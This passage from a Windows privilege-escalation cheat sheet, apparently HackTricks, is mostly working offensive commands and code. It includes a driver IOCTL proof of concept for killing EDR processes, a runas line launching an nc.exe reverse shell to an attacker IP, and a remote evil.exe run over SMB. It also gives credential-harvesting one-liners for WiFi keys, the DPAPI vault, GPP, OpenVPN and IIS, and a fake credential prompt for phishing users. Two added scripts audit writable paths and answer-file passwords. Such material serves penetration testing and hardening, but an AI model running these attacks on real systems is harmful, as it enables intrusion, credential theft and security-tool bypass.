accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Notepad++ plugin autoload persistence/execution
Notepad++ auto-loads any plugin DLL under its plugins subfolders. If a writable portable/copy install exists, dropping a malicious plugin gives automatic code execution inside notepad++.exe every time it starts (including from DllMain and plugin callbacks).
Notepad Plus Plus Plugin Autoload Persistence
Run at startup
Check whether you can overwrite some registry key or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autorun locations to escalate privileges:
Privilege Escalation with Autoruns
Drivers
Look for possible weird/vulnerable third-party drivers
driverquery
driverquery.exe /fo table
driverquery /SI
If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:
Arbitrary Kernel Rw Token Theft
For race-condition bugs where the vulnerable call opens an attacker-controlled Object Manager path, deliberately slowing the lookup (using max-length components or deep directory chains) can widen the window from microseconds to tens of microseconds:
Kernel Race Condition Object Manager Slowdown
Registry hive memory corruption primitives
Modern hive vulnerabilities let you arrange deterministic layouts, abuse writable HKLM/HKU descendants, and turn metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:
Windows Registry Hive Exploitation
Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)
Some signed third-party drivers create their device object with a strong SDDL via IoCreateDeviceSecure but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not enforced when the device is opened through a path that includes an extra component, allowing any unprivileged user to obtain a handle using a namespace path like:
- \\.\DeviceName\anything
- \\.\amsdk\anyfile (from a real-world case)
Once a user can open the device, the privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Example capabilities observed in the wild:
- Returning full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
- Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
- Terminating arbitrary processes, including Protected Process/Light (PP/PPL), enabling AV/EDR kill from user land via the kernel.
Minimal PoC pattern (user mode):
// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);
Mitigations for developers
- Always set FILE_DEVICE_SECURE_OPEN when creating device objects that are meant to be restricted by a DACL.
- Validate the caller context for privileged operations. Add PP/PPL checks before allowing process termination or handle returns.
- Constrain IOCTLs (access masks, METHOD_*, input validation) and consider brokered models instead of direct kernel privileges.
Detection ideas for defenders
- Monitor user-mode opens of suspicious device names (e.g., \\.\amsdk*) and the specific IOCTL sequences indicative of abuse.
- Enforce Microsoft's vulnerable driver blocklist (HVCI/WDAC/Smart App Control) and maintain your own allow/deny lists.
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you may be able to hijack a DLL loaded by a process and escalate privileges.
Check the permissions of all folders inside PATH:
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
For more information about how to abuse this check:
Writable Sys Path +Dll Hijacking Privesc
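An added example, not HackTricks' code, that replaces the icacls one-liners used earlier on this page (service binaries and their folders, the Program Files trees, and every PATH directory) with a single ACL check and returns the locations a low-privilege principal could write to. Names are my own; it assumes the current user's account is $env:USERDOMAIN\$env:USERNAME.

```powershell
# Added example (not HackTricks' code): lists service executables, their folders, installed
# application folders and PATH entries that Everyone, Authenticated Users, INTERACTIVE, Users
# or the current user can write to. A hit means a binary could be replaced or a DLL planted
# there; the remediation is to tighten the ACL.

$LowPrivNames = @('Everyone', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE',
                  'BUILTIN\Users', "$env:USERDOMAIN\$env:USERNAME")

# Rights that allow replacing or planting files (the (F)/(M)/(W) the icacls greps look for).
$WriteBits = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::WriteDacl -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Returns the low-privilege principals holding a write-capable allow ACE on $Path.
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivNames -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band ([int]$WriteBits)) -ne 0
    } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
}

function Get-ServiceBinaryPath {
    # Extracts the executable from a service PathName, quoted or not, dropping arguments.
    param([string]$PathName)
    if (-not $PathName) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '(?i)^(.*?\.exe)\b') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-WritableTargets {
    $targets = @()
    # 1. Service binaries and the folders they live in (the DLL search starts in the exe folder).
    foreach ($svc in Get-CimInstance Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if ($exe -and $exe -notlike 'C:\Windows\*') {
            $targets += [pscustomobject]@{ Kind = 'service exe';    Owner = $svc.Name; Path = $exe }
            $targets += [pscustomobject]@{ Kind = 'service folder'; Owner = $svc.Name; Path = (Split-Path $exe -Parent) }
        }
    }
    # 2. Installed application folders.
    foreach ($root in @($env:ProgramFiles, ${env:ProgramFiles(x86)})) {
        if (-not $root) { continue }
        foreach ($d in (Get-ChildItem -LiteralPath $root -Directory -ErrorAction SilentlyContinue)) {
            $targets += [pscustomobject]@{ Kind = 'program folder'; Owner = ''; Path = $d.FullName }
        }
    }
    # 3. PATH directories: a writable entry lets a planted DLL be found before the legitimate copy.
    foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ })) {
        $targets += [pscustomobject]@{ Kind = 'PATH dir'; Owner = ''; Path = $dir }
    }
    foreach ($t in ($targets | Sort-Object Path -Unique)) {
        $who = Test-LowPrivWritable -Path $t.Path
        if ($who) {
            [pscustomobject]@{ Kind = $t.Kind; Owner = $t.Owner; Path = $t.Path; WritableBy = ($who -join ', ') }
        }
    }
}

Get-WritableTargets | Format-Table -AutoSize
```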
Network
Shares
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
hosts file
Check for other known computers hardcoded in the hosts file
type C:\Windows\System32\drivers\etc\hosts
Network Interfaces & DNS
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Open Ports
Check for restricted services reachable only from the outside
netstat -ano #Opened ports?
Routing Table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP Table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Firewall Rules
Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)
More commands for network enumeration here
Windows Subsystem for Linux (wsl)
C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe
The bash.exe binary can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI whether nc should be allowed by the firewall).
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
To easily start bash as root, you can try --default-user root
You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
Windows Credentials
Winlogon Credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Credentials manager / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred option in order to use the saved credentials. The following example calls a remote binary via an SMB share.
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Using runas with a provided set of credentials.
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or the Empire PowerShell module can also be used to extract these credentials.
DPAPI
The Data Protection API (DPAPI) provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to contribute significantly to entropy.
DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets. In scenarios involving system encryption, it utilizes the system's domain authentication secrets.
Encrypted user RSA keys, protected with DPAPI, are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user's Security Identifier. The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file, typically consists of 64 bytes of random data. (Note that access to this directory is restricted, preventing listing of its contents via the dir command in CMD, though it can be listed through PowerShell.)
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.
The credentials files protected by the master password are usually located in:
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt them.
You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).
PowerShell Credentials
PowerShell credentials are often used for scripting and automation tasks as a convenient way to store encrypted credentials. The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.
To decrypt PS credentials from the file containing them you can do:
PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
john
PS C:\htb> $credential.GetNetworkCredential().password
JustAPWD!
Wifi
#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Saved RDP Connections
You can find them in HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\
Recently Run Commands
HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Remote Desktop Credential Manager
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Use the Mimikatz dpapi::rdg module with the appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module
Sticky Notes
People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.
AppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.
This code was extracted from PowerUP:
function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"
    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable
        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")
        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
            # Get application pool name
            $PoolName = $_
            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd
            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd
            # Check if credentials exists
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
            }
        }
        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {
            # Get Virtual Directory Name
            $VdirName = $_
            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd
            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd
            # Check if credentials exists
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
            }
        }
        # Check if any passwords were found
        if( $DataTable.rows.Count -gt 0 ) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}
SCClient / SCCM
Check if C:\Windows\CCM\SCClient.exe exists.
Installers are run with SYSTEM privileges, and many are vulnerable to DLL Sideloading (Info from https://github.com/enjoiz/Privesc).
$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }
Files and Registry (Credentials)
Putty Creds
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
Putty SSH Host Keys
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
SSH keys in registry
SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys, so you should check if there is anything interesting in there:
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
If the ssh-agent service is not running and you want it to automatically start on boot, run:
Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service
Tip
It looks like this technique isn't valid anymore. I tried to create some ssh keys, add them with ssh-add and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys doesn't exist and procmon didn't identify the use of dpapi.dll during the asymmetric key authentication.
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
You can also search for these files using metasploit: post/windows/gather/enum_unattend
Example content:
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
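As an added example (not code from the original page), the following Python audits the answer-file locations listed above for embedded credentials. Real answer files wrap each password as <Password><Value>…</Value><PlainText>false</PlainText></Password>, where a non-plaintext Value is base64 of UTF-16LE(password + "Password"); the script handles that form, the simplified <Password>base64</Password> form shown in the fragment above (including its broken padding), and redaction markers such as *SENSITIVE*DATA*DELETED*. The sample XML and the password Summer2024! are constructed for the demo.

```python
"""Find AutoLogon / LocalAccount credentials in Windows unattend answer files.

Added example, not code from the original page. The sample XML is constructed.
"""
import base64
import os
import re
import xml.etree.ElementTree as ET

# Candidate answer-file locations from the list above.
UNATTEND_PATHS = [
    r"C:\Windows\sysprep\sysprep.xml",
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\System32\Sysprep\unattend.xml",
]
_B64 = re.compile(r"^[A-Za-z0-9+/]+=*$")


def _local(tag):
    """Strip the XML namespace so elements can be matched by local name."""
    return tag.rsplit("}", 1)[-1]


def encode_password(password):
    """Encode as Setup does when PlainText is false: base64(UTF-16LE(pw + "Password"))."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


def decode_password(value, plaintext=False):
    """Reverse encode_password; tolerate broken padding and the base64(UTF-8) form
    shown on this page; pass clear text and redaction markers through unchanged."""
    value = value.strip()
    if plaintext or not _B64.match(value):
        return value
    body = value.rstrip("=")
    raw = base64.b64decode(body + "=" * (-len(body) % 4))  # normalise padding
    if len(raw) % 2 == 0:
        text = raw.decode("utf-16-le", "replace")
        if text.endswith("Password"):
            return text[: -len("Password")]
    return raw.decode("utf-8", "replace").rstrip("\r\n")


def _child_text(el, name):
    for c in el:
        if _local(c.tag) == name:
            return (c.text or "").strip()
    return None


def _password_of(container):
    """Handle <Password><Value/><PlainText/></Password> and <Password>text</Password>."""
    pw = next((c for c in container if _local(c.tag) == "Password"), None)
    if pw is None:
        return None
    value = _child_text(pw, "Value")
    if value is None:
        return decode_password(pw.text or "")
    return decode_password(value, (_child_text(pw, "PlainText") or "false").lower() == "true")


def find_credentials(xml_text, source):
    """One finding per AutoLogon / LocalAccount element that carries a password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        tag = _local(el.tag)
        if tag in ("AutoLogon", "LocalAccount"):
            pw = _password_of(el)
            if pw:
                findings.append({"source": source, "kind": tag, "password": pw,
                                 "user": _child_text(el, "Username" if tag == "AutoLogon" else "Name"),
                                 "group": _child_text(el, "Group")})
    return findings


def scan(paths=UNATTEND_PATHS):
    """Parse every candidate file that exists on this host; skip unparsable ones."""
    results = []
    for p in paths:
        if os.path.isfile(p):
            with open(p, encoding="utf-8-sig", errors="replace") as fh:
                try:
                    results.extend(find_credentials(fh.read(), p))
                except ET.ParseError:
                    pass
    return results


# Constructed sample in the real nested form; second password reuses the page's value.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend"
    xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64"
        publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS">
      <AutoLogon>
        <Password><Value>{encode_password("Summer2024!")}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
      </AutoLogon>
      <UserAccounts><LocalAccounts>
        <LocalAccount wcm:action="add">
          <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
          <Group>administrators;users</Group>
          <Name>Administrateur</Name>
        </LocalAccount>
      </LocalAccounts></UserAccounts>
    </component>
  </settings>
</unattend>"""

if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_UNATTEND, "constructed-sample") + scan():
        print(f"{hit['source']}: {hit['kind']} {hit['user']} ({hit['group']}) -> {hit['password']}")
```

Run it as the local user on a suspect host; any non-empty output means the answer file should be deleted or the password replaced, since these files are world-readable by default.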
SAM & SYSTEM backups
# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Cloud Credentials
#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
McAfee SiteList.xml
Cached GPP Password
A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.
To mitigate this risk, a function was developed to scan for locally cached GPP files containing a non-empty "cpassword" field. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.
Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:
- Groups.xml
- Services.xml
- Scheduledtasks.xml
- DataSources.xml
- Printers.xml
- Drives.xml
To decrypt the cPassword:
#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Using crackmapexec to get the passwords:
crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin
IIS Web Config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Example of web.config with credentials:
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
OpenVPN credentials
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
    $encryptedbytes=$item.'auth-data'
    $entropy=$item.'entropy'
    $entropy=$entropy[0..(($entropy.Length)-2)]
    $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedBytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
    Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
Logs
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
Ask for credentials
You can always ask the user to enter their credentials, or even the credentials of a different user if you think they may know them (note that asking the client directly for credentials is really risky):
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
Possible filenames containing credentials
Known files that at some point contained passwords in clear-text or Base64
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
Credentials in the RecycleBin
You should also check the Bin to look for credentials inside it
